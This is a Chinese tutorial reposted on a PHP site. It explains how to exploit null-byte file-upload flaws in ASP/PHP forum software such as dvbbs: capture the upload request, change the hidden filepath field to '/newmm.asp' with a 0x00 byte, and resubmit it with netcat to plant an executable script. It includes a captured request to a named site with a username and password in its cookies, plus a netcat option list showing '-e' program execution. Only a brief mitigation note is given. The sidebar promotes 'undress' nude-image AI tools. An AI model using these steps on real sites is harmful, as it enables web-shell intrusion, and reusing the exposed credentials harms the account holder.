Exploring PHP and ASP Upload Vulnerabilities_PHP Tutorial-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

Exploring PHP and ASP Upload Vulnerabilities_PHP Tutorial

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 15, 2016 pm 01:23 PM

asp form php upload principle and Explore Format loopholes use of

1 传漏洞利用的原理只是针对form格式上传的asp和php脚本***

nc(netcat)
用于提交数据包
dos界面下运行:
nc -vv www.***.com 80-vv: 回显
80: www端口
1.txt: 就是你要发送的数据包 (更多使用方法请查看本区的帖子)
wse(wsockexpert) 对本机端口的监视,抓取ie提交的数据包

2 漏洞原理

下面例子假设的前提

www主机: www.***.com;
bbs路径 : /bbs/
漏洞源于对动网上传文件的研究,建议有一定编程经验的看看dvbbs的upfile.asp文件,没有必要全部看懂。upfile是通过生成一个form表上传,如下

Copy after login

用到的变量:：

filepath 默认值uploadface 属性hiden
act 默认值upload 属性hiden
file1 就是你要传的那个文件

关键是 filepath 这个变量!

默认情况下我们的文件上传到www.***.com/bbs/uploadface/

文件是用你的上传时间命名的,就是upfile里的这一句

filename=formpath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&rannum&"."&fileext
--------------------------------------

我们知道计算机里面的数据是一""为标致的用过c语言的都知道：char data[]="bbs" 这个data数组长度是4: b b s
如果我们构造filepath如下,会怎么样呢?

filepath="/newmm.asp"
我们在2004.09.24.08.24传的文件就会发生变化没有改时:：_blank>http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时：_blank>http://www.***.com/newmm.asp/200409240824.jpg

这样当服务器接收filepath数据时,检测到newmm.asp后面的就理解为filepath的数据就结束了。这样我们上传的文件,比如c:.asp 就保存成: _blank>http://www.***.com/newmm.asp

3 后期补充

漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行。有很多网站只是加了n个hiden属性的变量对付网上公布的upfile.exe就是那个上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具。自己改wse抓到的包里的filepath变量,然后在用nc提交。就算他加n个hiden变量也于事无补。当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结就是我们的新理论诞生的时候!

4 详细实例
一、wse抓包结果(存到1.txt里)：

<p>post /bbs/upphoto/upfile.asp http/1.1 <br>accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, </p><p>application/x-shockwave-flash, application/vnd.ms-excel,</p><p>application/vnd.ms-powerpoint, application/msword, */* <br>referer: _blank>http://www.xin126.com/bbs/upphoto/upload.asp <br>accept-language: zh-cn <br>content-type: multipart/form-data; </p><p>boundary=-----------7d423a138d0278 <br>accept-encoding: gzip, deflate <br>user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322) <br>host: _blank>www.xin126.com <br>content-length: 1969 <br>connection: keep-alive <br>cache-control: no-cache <br>cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; </p><p>iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37; </p><p>username=szjwwwww; pass=5211314; dl=0; userid=62; </p><p>ltstyle=0; logintry=1; userpass=eb03f6c72908fd84 </p><p>-----------------------------7d423a138d0278 <br>content-disposition: form-data; name="filepath" </p><p>../medias/myphoto/ <br>-----------------------------7d423a138d0278 <br>... ... </p>

Copy after login

上传
---------------7d423a138d0278-----------------

二、ultraedit打开1.txt改数据：

...... <br>-----------------------------7d423a138d0278 <br>content-disposition: form-data; name="filepath" <br>/newmm.asp ...... <br>----------------------------

Copy after login

三、重新计算cookies长度,然后nc提交

nc -vv _blank>www.xin126.com 80

ultraedit是一个16位编辑器网上可以下载得到
我们主要用来写那个结束标致: ====>16位表示:0x00或者00h
其实你改的时候就直接再filepath的结尾处加个00就ok了

计算cookies长度===>你把fillepath改了之后、肯定是或＋或—cookies的长度变了

<br>...... <br>host: _blank>www.xin126.com <br>content-length: 1969 connection: keep-alive <br>cache-control: no-cache <br>......

Copy after login

计算会吧?一个字母、数字就是1

对于上传漏洞提出的解决思路：(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理
===>我们的对策就是把filepath变成常量。。。
这个方法是目前最有效的(我认为的)

2、加强对于的处理,原来我们是读到这里就结束
我们继续读直道下一个变量开始的地方，处理就ok了

附：NC Usage:

<p>监听外部主机 <br>nc [-options] hostname port[s] [ports] ... <br>监听本地主机 <br>nc -l -p port [options] [hostname] [port] <br>options: <br>-d detach from console, stealth mode <br>-e prog inbound program to exec [dangerous!!] <br>-g gateway source-routing hop point[s], up to 8 <br>-g num source-routing pointer: 4, 8, 12, ... <br>-h this cruft <br>-i secs delay interval for lines sent, ports scanned <br>-l listen mode, for inbound connects <br>-l listen harder, re-listen on socket close <br>-n numeric-only ip addresses, no dns <br>-o file hex dump of traffic <br>-p port local port number <br>-r randomize local and remote ports <br>-s addr local source address <br>-t answer telnet negotiation <br>-u udp mode <br>-v verbose [use twice to be more verbose] <br>-w secs timeout for connects and final net reads <br>-z zero-i/o mode [used for scanning] <br>port numbers can be individual or ranges: m-n [inclusive] </p>

Copy after login

(Editor:

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Repo: How To Revive Teammates

4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hello Kitty Island Adventure: How To Get Giant Seeds

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

How Long Does It Take To Beat Split Fiction?

3 weeks ago By DDD

R.E.P.O. Save File Location: Where Is It & How to Protect It?

3 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7315

Java Tutorial

1625

CakePHP Tutorial

1349

Laravel Tutorial

1261

PHP Tutorial

1208

Related knowledge

CakePHP Project Configuration Sep 10, 2024 pm 05:25 PM

In this chapter, we will understand the Environment Variables, General Configuration, Database Configuration and Email Configuration in CakePHP.

PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian Dec 24, 2024 pm 04:42 PM

PHP 8.4 brings several new features, security improvements, and performance improvements with healthy amounts of feature deprecations and removals. This guide explains how to install PHP 8.4 or upgrade to PHP 8.4 on Ubuntu, Debian, or their derivati

CakePHP Date and Time Sep 10, 2024 pm 05:27 PM

To work with date and time in cakephp4, we are going to make use of the available FrozenTime class.

CakePHP File upload Sep 10, 2024 pm 05:27 PM

To work on file upload we are going to use the form helper. Here, is an example for file upload.

CakePHP Routing Sep 10, 2024 pm 05:25 PM

In this chapter, we are going to learn the following topics related to routing ?

Discuss CakePHP Sep 10, 2024 pm 05:28 PM

CakePHP is an open-source framework for PHP. It is intended to make developing, deploying and maintaining applications much easier. CakePHP is based on a MVC-like architecture that is both powerful and easy to grasp. Models, Views, and Controllers gu

How To Set Up Visual Studio Code (VS Code) for PHP Development Dec 20, 2024 am 11:31 AM

Visual Studio Code, also known as VS Code, is a free source code editor — or integrated development environment (IDE) — available for all major operating systems. With a large collection of extensions for many programming languages, VS Code can be c

CakePHP Creating Validators Sep 10, 2024 pm 05:26 PM

Validator can be created by adding the following two lines in the controller.

See all articles